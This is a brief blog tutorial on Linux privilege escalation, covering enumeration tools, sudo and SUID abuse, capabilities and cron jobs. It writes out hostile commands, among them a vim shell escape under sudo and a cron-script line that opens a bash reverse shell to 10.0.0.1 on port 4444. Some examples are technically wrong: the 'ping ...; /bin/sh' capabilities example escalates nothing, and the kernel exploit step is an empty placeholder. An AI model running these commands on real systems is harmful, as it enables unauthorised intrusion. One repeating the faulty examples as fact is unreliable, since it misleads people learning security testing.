Linux privilege Escalation Techniques

Aditya Chauhan
3 min readMar 27, 2023

Introduction

Linux privilege escalation refers to the process of gaining elevated privileges on a Linux system. It involves exploiting vulnerabilities, misconfigurations or weaknesses in the system to gain root access or higher-level permissions than you were initially granted. In this blog, we will explore different types of Linux privilege escalation techniques with practical examples.

Enumeration

Before we start exploring the different techniques of Linux privilege escalation, we need to understand the importance of enumeration. Enumeration is the process of gathering information about the system, services, and applications running on the system. It is an essential step in privilege escalation because it helps identify vulnerabilities and potential attack vectors.

Some of the tools used for enumeration are:

  • nmap - A powerful network scanner that can identify open ports, services and operating system information.
  • enum4linux - A tool used to enumerate Windows and Samba hosts to discover information such as user names, shares, and passwords.
  • pspy - A tool used to monitor running processes and identify file permission vulnerabilities.

Automated Tools

Automated tools are a great way to identify potential vulnerabilities and attack vectors quickly. Some popular automated tools for Linux privilege escalation are:

  • LinEnum.sh - A shell script that enumerates the system for possible privilege escalation paths.
  • LinPeas.sh - A similar shell script to LinEnum, but with additional features such as SUID/SGID analysis, process and binary analysis, etc.
  • GTFOBins - A curated list of Unix binaries that can be used to bypass local security restrictions.

Kernel Exploitation

Kernel exploits involve exploiting vulnerabilities in the Linux kernel to gain elevated privileges. These types of exploits can be very dangerous as they can give an attacker complete control over the system.

Practical Example

Suppose you find that the sock_diag_handlers function in the Linux kernel has a buffer overflow vulnerability. In this case, you can create a malicious payload that exploits this vulnerability and gain root access.

gcc -o exploit exploit.c
./exploit

SUDO Exploitation

Sudo is a powerful utility in Linux that allows users to run commands with elevated privileges. If sudo is misconfigured, an attacker can use it to execute commands with elevated privileges.

Practical Example

Suppose you find that the sudo command is configured to allow a non-root user to run the vim editor with root privileges. In this case, you can open the vim editor and execute commands with elevated privileges.

sudo vim -c ':!/bin/sh'

SUID Exploitation

Setuid binaries are special programs that are executed with the permissions of their owner. If a setuid binary is owned by the root user, it can be exploited to gain root access.

Practical Example

Suppose you find a setuid binary called mybinary that is owned by the root user. In this case, you can execute mybinary and exploit it to gain root access.

./mybinary -c "/bin/sh"

Capabilities

Linux has a feature called capabilities that allows certain privileges to be assigned to a process without requiring full root privileges. This feature can be exploited to gain elevated privileges.

Practical Example

Suppose you find that the ping command has the CAP_NET_RAW capability. In this case, you can use this capability to run other commands with elevated privileges.

ping -c 1 google.com; /bin/sh

Cron Jobs

Cron is a utility that allows users to schedule commands or scripts to run automatically at specified times or intervals. If a cron job is running with elevated privileges or running a script with a vulnerability, an attacker can exploit it to gain root access.

Practical Example

Suppose you find that a cron job is running a script with a vulnerability that allows an attacker to execute commands with elevated privileges. In this case, you can modify the script to execute a reverse shell and gain root access.

echo "/bin/bash -c 'exec bash -i &>/dev/tcp/10.0.0.1/4444 <&1'" >> script.sh
chmod +x script.sh

Now, wait for the cron job to run the script and establish a reverse shell.

Conclusion

In conclusion, Linux privilege escalation is a critical aspect of penetration testing and security auditing. It is essential to identify and exploit vulnerabilities in the system to assess its security posture. Enumeration, automated tools, kernel exploitation, SUDO exploitation, SUID exploitation, capabilities, and cron jobs are some of the techniques used for privilege escalation. It is important to note that these techniques should only be used for ethical purposes with the system owner’s consent.

--

--

Aditya Chauhan

ISO 27001 LA | VAPT | Synack Red Teamer | HTB Dante | HTB RASTA | HTB Cybernetics | HTB Offshore | HTB APTLabs | Cyber Security Analyst | Security Researcher